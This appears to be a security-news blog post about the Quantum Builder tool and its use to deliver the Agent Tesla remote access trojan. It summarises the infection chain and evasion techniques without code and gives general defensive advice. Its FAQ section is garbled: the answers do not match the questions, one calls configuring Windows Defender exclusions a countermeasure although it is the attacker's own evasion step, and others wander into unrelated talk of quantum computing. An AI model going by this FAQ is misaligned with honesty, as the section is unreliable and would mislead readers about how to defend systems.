Where data is home
Where Data is Home

Hackers Utilize Dark Web Quantum Builder For Agent Tesla Rat Malware

Data Breaches
By Editor
Defending Against Malware
0 35

The usage of the malicious tool Quantum Builder, also known as Quantum Link Builder, by hackers to deploy the Agent Tesla Remote Access Trojan (RAT) malware has become a growing concern. The Lazarus Group APT, known for their advanced persistent threats, is associated with Quantum Builder due to shared tactics, techniques, and source code overlaps. This tool enables threat actors to create and distribute malicious payloads, including LNK, HTA, and PowerShell files, which are used to deliver the Agent Tesla malware. To evade detection, Quantum Builder employs various techniques such as bypassing User Account Control, configuring Windows Defender exclusions, utilizing LOLBins for multi-stage infection chains, executing PowerShell scripts in memory, and employing decoys as distraction tactics. The tool is readily available on the dark web for a monthly subscription fee and has witnessed a significant surge in usage in recent months. In targeted attacks against organizations, particularly in the recent Agent Tesla campaign, hackers have been exploiting the capabilities of Quantum Builder.

Key Takeaways

  • Quantum Builder is a malicious tool used by hackers to generate payloads and deliver the Agent Tesla malware.
  • The Quantum Builder is available on the dark web for a monthly subscription fee of €189 and offers various options for creating malicious files and payloads.
  • The malware infection chain initiated by Quantum Builder involves phishing emails with GZIP or ZIP attachments containing shortcuts that execute PowerShell code to launch remote HTA and ultimately deliver Agent Tesla.
  • There has been a significant increase in the usage of Quantum Builder in recent months, with threat actors utilizing it to distribute various types of malware, including the Agent Tesla campaign.

What is Quantum Builder?

Quantum Builder, also known as Quantum Link Builder, is a malicious shortcut file creation tool that has been linked with the Lazarus Group APT due to shared tactics, techniques, and procedures (TTPs) as well as source code overlaps. This tool has had a significant impact on the underground cybercrime ecosystem, as threat actors utilize it to generate malicious payloads such as LNK, HTA, and PowerShell. These payloads are then used to deliver the Agent Tesla malware in targeted attacks. To defend against Quantum Builder-based attacks, organizations can employ several mitigation strategies. These include implementing robust email security measures to prevent phishing attempts, regularly updating and patching software to address vulnerabilities, and educating employees about the dangers of opening suspicious attachments or clicking on unknown links. Additionally, organizations should employ robust endpoint protection solutions that can detect and block malicious activities associated with Quantum Builder.

Techniques used by Quantum Builder

The techniques employed by Quantum Builder involve bypassing User Account Control and configuring Windows Defender exclusions. By utilizing the Microsoft Connection Manager Profile Installer (CMSTP) binary, the software bypasses User Account Control to gain elevated privileges. This allows the malicious payloads generated by Quantum Builder to execute without alerting the user. Additionally, the tool configures Windows Defender exclusions to avoid detection by antivirus software. Quantum Builder also integrates attack vectors using LOLBins (Living Off the Land Binaries) for a multi-stage infection chain. This involves leveraging legitimate system binaries to carry out malicious activities, making it harder to detect and mitigate the attack. Furthermore, Quantum Builder executes PowerShell scripts in memory, evading detection by running malicious commands without writing them to disk. Lastly, the tool employs decoys as distraction tactics to divert attention away from the actual infection.

Increase in Quantum Builder usage

There has been a notable surge in the usage of Quantum Builder, a specific tool that demonstrates an upward trend in its adoption for distributing various types of malware, including in recent campaigns targeting organizations. This increase in usage has had a significant impact on the cybersecurity landscape. The tool’s ability to generate malicious payloads and evade detection through techniques such as bypassing User Account Control and executing PowerShell scripts in memory poses a serious threat to organizations. To mitigate the risks associated with Quantum Builder usage, organizations should implement strategies such as regularly updating security software, conducting employee training on phishing awareness, and implementing strong access controls. Additionally, organizations should monitor their networks for any signs of Quantum Builder activity and promptly respond to any potential threats.

Frequently Asked Questions

How does Quantum Builder bypass User Account Control with the Microsoft Connection Manager Profile Installer (CMSTP) binary?

The potential consequences of using Quantum Builder by hackers include bypassing User Account Control through the Microsoft Connection Manager Profile Installer binary, allowing for unauthorized access and execution of malicious payloads. Countermeasures and security measures are in place to detect and prevent Quantum Builder attacks, such as configuring Windows Defender exclusions and utilizing LOLBins for multi-stage infection chain.

Can Quantum Builder configure Windows Defender exclusions? If so, how does it do it?

Quantum Builder can be used for other types of malware besides Agent Tesla RAT. The potential risks and implications of hackers using Quantum Builder on the dark web include the widespread distribution of various malware and the ability to bypass security measures, leading to increased cyber threats.

What are LOLBins and how does Quantum Builder integrate them into the attack vectors?

Lolbins, or Living Off the Land binaries, are legitimate system binaries that hackers misuse to carry out malicious activities. Quantum Builder integrates these lolbins as attack vectors, leveraging their trusted nature to evade detection. To detect and prevent lolbin attacks, strategies such as monitoring and analyzing lolbin usage, implementing application whitelisting, and conducting regular security audits are crucial. The role of quantum computing in cybersecurity is not directly related to the detection and prevention of lolbin attacks.

How does Quantum Builder execute PowerShell scripts in memory to evade detection?

Quantum Builder evades detection by executing PowerShell scripts in memory. This technique allows the malware to avoid leaving traces on disk, making it harder for security solutions to detect and mitigate the attack. To counter such memory-based attacks, techniques like behavioral analysis, anomaly detection, and memory protection mechanisms can be employed. Additionally, monitoring and analyzing PowerShell activity can help identify and block malicious scripts. The impact of quantum computing on cybersecurity is unrelated to this discussion.

What are the decoys used by Quantum Builder as distraction tactics after infection?

Decoy tactics employed by Quantum Builder serve as distraction measures following infection, aiming to divert attention from the malware’s presence. These tactics, part of Quantum Builder’s evasion techniques, are utilized to impede detection and analysis processes.

Continue Reading
Editor 1200 posts 0 comments
Das könnte dir auch gefallen Mehr vom Autor
Hinterlasse eine Antwort

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More